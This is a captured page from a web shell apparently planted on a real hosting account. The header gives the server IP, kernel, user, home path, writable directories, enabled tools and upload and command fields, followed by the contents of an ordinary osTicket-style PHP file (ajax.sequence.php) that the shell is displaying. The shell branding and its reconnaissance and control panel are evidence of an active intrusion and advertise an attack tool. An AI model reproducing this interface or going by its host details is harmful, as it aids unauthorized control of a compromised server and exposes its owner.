- GRAYBYTE UNDETECTABLE CODES -

403Webshell
Server IP : 184.154.167.98  /  Your IP : 18.219.248.129
Web Server : Apache
System : Linux pink.dnsnetservice.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64
User : puertode ( 1767)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/puertode/public_html/mesa/include/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/puertode/public_html/mesa/include/ajax.sequence.php
<?php

require_once(INCLUDE_DIR . 'class.sequence.php');

class SequenceAjaxAPI extends AjaxController {

    /**
     * Ajax: GET /sequence/<id>
     *
     * Fetches the current value of a sequence
     *
     * Get-Arguments:
     * format - (string) format string used to format the current value of
     *      the sequence.
     *
     * Returns:
     * (string) Current sequence number, optionally formatted
     *
     * Throws:
     * 403 - Not logged in
     * 404 - Unknown sequence id
     * 422 - Invalid sequence id
     */
    function current($id) {
        global $thisstaff;

        if (!$thisstaff)
            Http::response(403, 'Login required');
        elseif ($id == 0)
            $sequence = new RandomSequence();
        elseif (!$id || !is_numeric($id))
            Http::response(422, 'Id is required');
        elseif (!($sequence = Sequence::lookup($id)))
            Http::response(404, 'No such object');

        return $sequence->current(Format::htmlchars($_GET['format']));
    }

    /**
     * Ajax: GET|POST /sequence/manage
     *
     * Gets a dialog box content or updates data from the content
     *
     * Post-Arguments:
     * seq[<id>][*] - Updated information for existing sequences
     * seq[<new-*>[*] - Information for new sequences
     * seq[<id>][deleted] - If set to true, indicates that the sequence
     *      should be deleted from the database
     *
     * Throws:
     * 403 - Not logged in
     * 422 - Information sent for update of unknown sequence
     */
    function manage() {
        global $thisstaff;

        if (!$thisstaff)
            Http::response(403, 'Login required');

        $sequences = Sequence::objects()->all();
        $info = array(
            'action' => '#sequence/manage',
        );

        $valid = true;
        if ($_POST) {
            foreach ($_POST['seq'] as $id=>$info) {
                if (strpos($id, 'new-') === 0) {
                    unset($info['id']);
                    $sequences[] = new Sequence($info);
                }
                else {
                    foreach ($sequences as $s) {
                        if ($s->id == $id)
                            break;
                        $s = false;
                    }
                    if (!$s) {
                        Http::response(422, $id . ': Invalid or unknown sequence');
                    }
                    elseif ($info['deleted']) {
                        $s->delete();
                        continue;
                    }
                    foreach ($info as $f=>$val) {
                        if (isset($s->{$f}))
                            $s->set($f, $val);
                        elseif ($f == 'current')
                            $s->next = $val;
                    }
                    if (($v = $s->isValid()) !== true) {
                        $msg = sprintf('%s: %s', $s->getName(), $valid);
                        $valid = false;
                    }
                }
            }
            if ($valid) {
                foreach ($sequences as $s)
                    $s->save();
                Http::response(205, 'All sequences updated');
            }
        }

        include STAFFINC_DIR . 'templates/sequence-manage.tmpl.php';
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit